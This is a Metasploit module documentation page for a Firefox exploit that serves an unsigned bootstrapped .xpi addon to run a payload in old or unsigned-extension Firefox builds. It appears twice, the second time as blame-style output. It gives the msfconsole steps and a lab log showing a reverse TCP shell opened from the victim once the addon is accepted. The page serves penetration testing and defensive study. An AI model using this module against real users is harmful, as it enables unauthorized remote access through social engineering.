documentation/modules/exploit/multi/browser/firefox_xpi_bootstrapped_addon.md

## Vulnerable Application

Mozilla Firefox before version 41 allowed users to install
unsigned browser extensions from arbitrary web servers.

This module dynamically creates an unsigned .xpi addon file.
The resulting bootstrapped Firefox addon is presented to
the victim via a web page. The victim's Firefox browser
will pop a dialog asking if they trust the addon.

Once the user clicks "install", the addon is installed and
executes the payload with full user permissions. As of Firefox
4, this will work without a restart as the addon is marked to
be "bootstrapped". As the addon will execute the payload after
each Firefox restart, an option can be given to automatically
uninstall the addon once the payload has been executed.

As of Firefox 41, unsigned extensions can still be installed
on Firefox Nightly, Unbranded and Development builds when
configured with `xpinstall.signatures.required` set to `false`.

Note: this module generates legacy extensions which are
supported only in Firefox before version 57.


### Installation

Download an old Developer Edition (version 4 < 57) installer from:

* https://download-origin.cdn.mozilla.net/pub/devedition/releases/

Browse to `about:config` and set `xpinstall.signatures.required` to `false`.

Open Tools -> Options, search for "updates" and select "Never check for updates".


## Verification Steps

1. Start `msfconsole`
1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
1. Do: `set SRVHOST [IP]`
1. Do: `run`

## Options


## Scenarios

### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled

Run the module and load the web server URL in Firefox. Install the extension when prompted.

```
msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon 
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Using URL: http://192.168.200.130:8080/Oj8qCs
[*] Server started.
msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > 
[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Redirecting request.
[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending HTML response.
[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400
```
firefox_xpi_bootstrapped_addon: Add notes, description, references, docs 2022-09-05 02:23:37 +10:00			`## Vulnerable Application`

			`Mozilla Firefox before version 41 allowed users to install`
			`unsigned browser extensions from arbitrary web servers.`

			`This module dynamically creates an unsigned .xpi addon file.`
			`The resulting bootstrapped Firefox addon is presented to`
			`the victim via a web page. The victim's Firefox browser`
			`will pop a dialog asking if they trust the addon.`

			`Once the user clicks "install", the addon is installed and`
			`executes the payload with full user permissions. As of Firefox`
			`4, this will work without a restart as the addon is marked to`
			`be "bootstrapped". As the addon will execute the payload after`
			`each Firefox restart, an option can be given to automatically`
			`uninstall the addon once the payload has been executed.`

			`As of Firefox 41, unsigned extensions can still be installed`
			`on Firefox Nightly, Unbranded and Development builds when`
			configured with `xpinstall.signatures.required` set to `false`.

			`Note: this module generates legacy extensions which are`
			`supported only in Firefox before version 57.`


			`### Installation`

			`Download an old Developer Edition (version 4 < 57) installer from:`

			`* https://download-origin.cdn.mozilla.net/pub/devedition/releases/`

			Browse to `about:config` and set `xpinstall.signatures.required` to `false`.

			`Open Tools -> Options, search for "updates" and select "Never check for updates".`


			`## Verification Steps`

			1. Start `msfconsole`
			1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
			1. Do: `set SRVHOST [IP]`
			1. Do: `run`

			`## Options`


			`## Scenarios`

			`### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled`

			`Run the module and load the web server URL in Firefox. Install the extension when prompted.`

			```
			`msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
			`[*] No payload configured, defaulting to generic/shell_reverse_tcp`
			`msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`

			`[*] Started reverse TCP handler on 192.168.200.130:4444`
			`[*] Using URL: http://192.168.200.130:8080/Oj8qCs`
			`[*] Server started.`
			`msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) >`
			`[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Redirecting request.`
			`[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending HTML response.`
			`[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...`
			`[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...`
			`[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400`
			```